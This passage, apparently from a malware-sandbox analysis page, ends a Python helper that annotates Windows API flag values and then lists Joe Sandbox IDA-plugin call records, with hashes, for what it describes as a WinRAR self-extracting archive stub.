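    rest = value & ~sum(table)           # bits not covered by the table stay visible
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"


def describe(call: dict) -> list:
    """Name the mode/flag immediates for the APIs whose arguments matter in triage."""
    api, a = call["api"], call["args"]

    def arg(i):
        return a[i] if i < len(a) and isinstance(a[i], int) else None

    notes = []
    if api == "CreateFileW":
        if (d := arg(4)) is not None:
            notes.append("dwCreationDisposition=" + CREATE_DISPOSITION.get(d, hex(d)))
        if (f := arg(5)) is not None:
            notes.append("dwFlagsAndAttributes=" + _flag_names(f, FILE_FLAGS))
    elif api == "LoadLibraryExW":
        if (f := arg(2)) is not None:
            notes.append("dwFlags=" + _flag_names(f, LOADLIB_FLAGS))
    elif api == "GetStdHandle":
        if (v := arg(0)) is not None:
            # Assumption: the plugin prints "push -10" as its sign-extended imm8 (000000F6),
            # so values in 0x80..0xFF are re-signed as bytes, larger ones as DWORDs.
            s = v - 0x100 if 0x80 <= v < 0x100 else (v - 0x100000000 if v >= 0x80000000 else v)
            notes.append("nStdHandle=" + STD_HANDLES.get(s, str(s)))
    elif api == "SendMessageW":
        if (msg := arg(1)) is not None:
            notes.append("Msg=" + EDIT_MESSAGES.get(msg, hex(msg)))
    elif api == "ShowWindow":
        if (c := arg(1)) is not None:
            notes.append("nCmdShow=" + ("SW_SHOW" if c == 5 else str(c)))
    return notes


def annotate(text: str) -> list:
    """One line per call: '<ref> <api> [<annotations>]', sub-calls marked with their caller."""
    out = []
    for c in parse_report(text):
        prefix = f"(via {c['subcall']}) " if c["subcall"] else ""
        out.append(f"{c['ref']:08X} {prefix}{c['api']} {describe(c)}")
    return out


# Lines copied from the listings on this page.
SAMPLE = """\
• CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00C98243,?,00000005,?,00000011), ref: 00C9ABBF
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CB4D43,00000000,?,00CF40C4,?,?,?,00CB4EE6,00000004,InitializeCriticalSectionEx,00CC7424,InitializeCriticalSectionEx), ref: 00CB4D9F
• GetStdHandle.KERNEL32(000000F6), ref: 00C9A9F5
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CAE6D0
• GetLastError.KERNEL32 ref: 00C9AA3F
  • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
"""

if __name__ == "__main__":
    print("\n".join(annotate(SAMPLE)))
```

Run over the whole page, the decoder turns the listing into a quick sanity check: every flag it names here is what a stock archive extractor and its CRT would use, which is the expected result for a WinRAR SFX stub and is why the interesting behaviour of this sample has to be looked for in the archive it carries rather than in these functions.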
    APIs
      • Part of subcall function 00C9D68B: _wcslen.LIBCMT ref: 00C9D691
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B569
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B59C
    • GetLastError.KERNEL32(?,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B5B9
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CreateDirectory$ErrorLast_wcslen
    • String ID:
    • API String ID: 2260680371-0
    • Opcode ID: 678c5960024ba6890a03fcc3e9a3669c942aead6c739e1f6e0431e48999e0379
    • Instruction ID: c0f2312ff505aebaedad0bacf8ef3c44bee6421bc7c65beb59c30ff4ccaa929e
    • Opcode Fuzzy Hash: 678c5960024ba6890a03fcc3e9a3669c942aead6c739e1f6e0431e48999e0379
    • Instruction Fuzzy Hash: 0001D471204220BAEF25AB70BE5DFFE32589F0A780F054415F912E6081DB64DF8297A5
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CBCA68
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-3916222277
    • Opcode ID: 3168a23929b0ef216c4588175fd62cf41724c7de8ae1e262a8636ebb138bb28e
    • Instruction ID: cb867c18e42d8c7039a26fdb3997344828917c6333dd2a5c11b1c9ade5ce0f82
    • Opcode Fuzzy Hash: 3168a23929b0ef216c4588175fd62cf41724c7de8ae1e262a8636ebb138bb28e
    • Instruction Fuzzy Hash: 2141147050428C9FDF228E68CCC5BFABBA9EF55704F2404EDE59A87142D235AE459F60
    APIs
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 00CBC18D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: String
    • String ID: LCMapStringEx
    • API String ID: 2568140703-3893581201
    • Opcode ID: 20acc7b39a78c83580e0a3ed097ee22135688ca546db623ae57fc652d6791d15
    • Instruction ID: 2545614a2b7aa45f2c48c22f97bb5b280414c9465e5b73682d25366f98018429
    • Opcode Fuzzy Hash: 20acc7b39a78c83580e0a3ed097ee22135688ca546db623ae57fc652d6791d15
    • Instruction Fuzzy Hash: E801D332541209BBCF129FA4DC02EEE7FA2EF08760F414116FE1866161CA729971AB80
    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CBB71F), ref: 00CBC105
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: InitializeCriticalSectionEx
    • API String ID: 2593887523-3084827643
    • Opcode ID: 75dc894c5bffec05a78e53babcb9798bffe56fedff7467c09f8398c4d65916c3
    • Instruction ID: 2b39f1d1d78eac3ccb97b0eb5da36dbde4c8a70eb5d146e4cb7d6847ce7eb86e
    • Opcode Fuzzy Hash: 75dc894c5bffec05a78e53babcb9798bffe56fedff7467c09f8398c4d65916c3
    • Instruction Fuzzy Hash: 1AF0B431641118BBCF159F55DC02FEE7FA1DB18750F00402AFD056A160CE719D10AB80
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Alloc
    • String ID: FlsAlloc
    • API String ID: 2773662609-671089009
    • Opcode ID: 0786745ed9155d5c36b7448898dc3337b7f9b1584469bed93ad114374b0a07c8
    • Instruction ID: 34a9ab488e1d03f7f4a4d8b6da73c1afe5df4bd6c3216d74ce6a6107875eb0c1
    • Opcode Fuzzy Hash: 0786745ed9155d5c36b7448898dc3337b7f9b1584469bed93ad114374b0a07c8
    • Instruction Fuzzy Hash: 0EE0E531A412186B86156BA4DC02FBFBBA5CB04B21F51016AF80567290CFB15E019ACA
    APIs
      • Part of subcall function 00CBC96B: GetOEMCP.KERNEL32(00000000,?,?,00CBCBF4,?), ref: 00CBC996
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CBCC39,?,00000000), ref: 00CBCE14
    • GetCPInfo.KERNEL32(00000000,00CBCC39,?,?,?,00CBCC39,?,00000000), ref: 00CBCE27
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CodeInfoPageValid
    • String ID:
    • API String ID: 546120528-0
    • Opcode ID: d9e796ef34991693664203e18fd9be442ac3f06ebb28021b9bda3c6f51363de4
    • Instruction ID: f7ed70a3329890f31b0034294fb71be15165814466710789a201b0ce8343e757
    • Opcode Fuzzy Hash: d9e796ef34991693664203e18fd9be442ac3f06ebb28021b9bda3c6f51363de4
    • Instruction Fuzzy Hash: 0A512471D002459FEB249F75C8D16FBBBE5EF41310F1440AEE0A68B192D735DA46DB90
    APIs
    • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,00C9ACB0,?,?,00000000,?,?,00C99C8B,?), ref: 00C9AE3A
    • GetLastError.KERNEL32(?,?,00C99C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 00C9AE49
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 48c1fc6dbdc7f6c0b1f423d09d0790a3f3bc57bbf462e33427e217aed1f899e7
    • Instruction ID: dd14464cac8cbb028f2250316942662cea51bdb7e01ee78f54cceed40f11b4b7
    • Opcode Fuzzy Hash: 48c1fc6dbdc7f6c0b1f423d09d0790a3f3bc57bbf462e33427e217aed1f899e7
    • Instruction Fuzzy Hash: 684125366043458BDF28AF25C88CBAE73A4FF88362F104529E85683A50D771DD85DBD3
    APIs
    • ShowWindow.USER32(00000000,00000005,?,?,?,?,00CAA7F6,00000000,?), ref: 00CAA699
    • SetWindowTextW.USER32(00000000,00000000), ref: 00CAA6A3
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Window$ShowText
    • String ID:
    • API String ID: 1551406749-0
    • Opcode ID: 6d5b4c9d347a2e411b9db36a9df6143da0de974b47ddfd5a9d7df693a1f22161
    • Instruction ID: 2a45427dce84bb5aef4a433aeb24b6cb7452d07b05d07b42af9c451f5592ff2e
    • Opcode Fuzzy Hash: 6d5b4c9d347a2e411b9db36a9df6143da0de974b47ddfd5a9d7df693a1f22161
    • Instruction Fuzzy Hash: 46314931600716AFDB14DF64DC94E2EBBA8FF49704B09452EF64597260DB61BC41CF92
    APIs
      • Part of subcall function 00CBA505: GetLastError.KERNEL32(?,00CD3070,00CB5972,00CD3070,?,?,00CB5271,00000050,?,00CD3070,00000200), ref: 00CBA509
      • Part of subcall function 00CBA505: _free.LIBCMT ref: 00CBA53C
      • Part of subcall function 00CBA505: SetLastError.KERNEL32(00000000,?,00CD3070,00000200), ref: 00CBA57D
      • Part of subcall function 00CBA505: _abort.LIBCMT ref: 00CBA583
      • Part of subcall function 00CBCCFE: _abort.LIBCMT ref: 00CBCD30
      • Part of subcall function 00CBCCFE: _free.LIBCMT ref: 00CBCD64
      • Part of subcall function 00CBC96B: GetOEMCP.KERNEL32(00000000,?,?,00CBCBF4,?), ref: 00CBC996
    • _free.LIBCMT ref: 00CBCC4F
    • _free.LIBCMT ref: 00CBCC85
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorLast_abort
    • String ID:
    • API String ID: 2991157371-0
    • Opcode ID: 74e2e52e078f3ed82e3823238e732fa1d2f53dcfe603c1e0887d6849100f1fd3
    • Instruction ID: 36ec86ab3c3cc1be5b6bea055f2e8ba7badf3b88611e9990841e150c5bb8b1dd
    • Opcode Fuzzy Hash: 74e2e52e078f3ed82e3823238e732fa1d2f53dcfe603c1e0887d6849100f1fd3
    • Instruction Fuzzy Hash: 4D31E871904108AFDB14EFA9D8C1BEDBBF5EF50321F25409AF5189B291EB365E40EB40
    APIs
    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C97ED0,?,?,?,00000000), ref: 00C9B04C
    • SetFileTime.KERNEL32(?,?,?,?), ref: 00C9B100
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$BuffersFlushTime
    • String ID:
    • API String ID: 1392018926-0
    • Opcode ID: 8a592e1256f7ec49139816e8f900be79d4c28b92d02763b0d5f12d91c2184ea1
    • Instruction ID: 0cc63fa3cb01a64dd4456024c67328111bb9afc5f28eeb793851d489746ba454
    • Opcode Fuzzy Hash: 8a592e1256f7ec49139816e8f900be79d4c28b92d02763b0d5f12d91c2184ea1
    • Instruction Fuzzy Hash: 0C213471289242EFCB14CE74DA99AABBBE4AF91304F04491CF4E183141D72AEE0CD762
    APIs
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00C9B1B7,?,?,00C981FD), ref: 00C9A946
    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00C9B1B7,?,?,00C981FD), ref: 00C9A976
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 5085afce684c2bfc02e3621b3a7e66def9595d986c75de83ddc740c51867a211
    • Instruction ID: 3b59681fe9d68b538ac941cd7115574b1d7ec7bd43d24daf42fe658f7fb5bf31
    • Opcode Fuzzy Hash: 5085afce684c2bfc02e3621b3a7e66def9595d986c75de83ddc740c51867a211
    • Instruction Fuzzy Hash: A921F2B15043446EE7308A65CC8CFB776ECEB4A364F024A19F9E6C21C1C774A985D6B2
    APIs
    • FreeLibrary.KERNEL32(00000000,?,00CF40C4,?,?,?,00CB4EE6,00000004,InitializeCriticalSectionEx,00CC7424,InitializeCriticalSectionEx,00000000,?,00CB4C9D,00CF40C4,00000FA0), ref: 00CB4D75
    • GetProcAddress.KERNEL32(00000000,?), ref: 00CB4D7F
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressFreeLibraryProc
    • String ID:
    • API String ID: 3013587201-0
    • Opcode ID: 77931cb37ed89e45a2406153072184fbbb7a944e951cc6d3dd410f368d8aeee5
    • Instruction ID: 91833a04383488be658eef998be2a7c6db3b03adeffb36ae516207ee9758247d
    • Opcode Fuzzy Hash: 77931cb37ed89e45a2406153072184fbbb7a944e951cc6d3dd410f368d8aeee5
    • Instruction Fuzzy Hash: 95117C31608115AF8F2ACFB4E890AEE73B4EB96750B254269EA25D7211E7309E01CB91
    APIs
    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00C9B157
    • GetLastError.KERNEL32 ref: 00C9B164
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: 3a76742cb59f6387fd64ee3cc469488b52c8bcb5c21d6443baae065de68ba59d
    • Instruction ID: 8478b4cee5b03baf3b263416c5d962a38542b710a51793448c9a0d05524765ef
    • Opcode Fuzzy Hash: 3a76742cb59f6387fd64ee3cc469488b52c8bcb5c21d6443baae065de68ba59d
    • Instruction Fuzzy Hash: D111E131600700FBDF298A68E96CBAEB3E9BB44360F604769E162935D0E770EE05C750
    APIs
    • _free.LIBCMT ref: 00CBA6B5
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00CD30C4,00C9187A,?,?,00000007,?,?,?,00C913F2,?,00000000), ref: 00CBA6F1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Heap$AllocAllocate_free
    • String ID:
    • API String ID: 2447670028-0
    • Opcode ID: 28403e33c6e08039890badaf6d5f13fe1919f800c1435539f2c34e564069a669
    • Instruction ID: 5b76ed4781a2e1bb33b64cc9c270dd8d556e8b475f4af9365020da2910392348
    • Opcode Fuzzy Hash: 28403e33c6e08039890badaf6d5f13fe1919f800c1435539f2c34e564069a669
    • Instruction Fuzzy Hash: 7EF096B1601115B6CB213A66AC45FEF37689FC17B1F1D4016F8E5A71A1EF30DD00A567
    APIs
    • GetCurrentProcess.KERNEL32(?,?), ref: 00CA23C3
    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CA23CA
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Process$AffinityCurrentMask
    • String ID:
    • API String ID: 1231390398-0
    • Opcode ID: 1de9ee9966584de5aed54762ae1c8b47e5440b77990838b351987f090742d69f
    • Instruction ID: dd922bb0102cac28a684fe459c9184c20a3abe88f3851ddc7e03c2cb6d327091
    • Opcode Fuzzy Hash: 1de9ee9966584de5aed54762ae1c8b47e5440b77990838b351987f090742d69f
    • Instruction Fuzzy Hash: F1E09232B01126A7CF0987A8DC45EAF72ECEB56209324C175E613D3110E978DE0547A0
    APIs
      • Part of subcall function 00CBD0E0: GetEnvironmentStringsW.KERNEL32 ref: 00CBD0E9
      • Part of subcall function 00CBD0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBD10C
      • Part of subcall function 00CBD0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CBD132
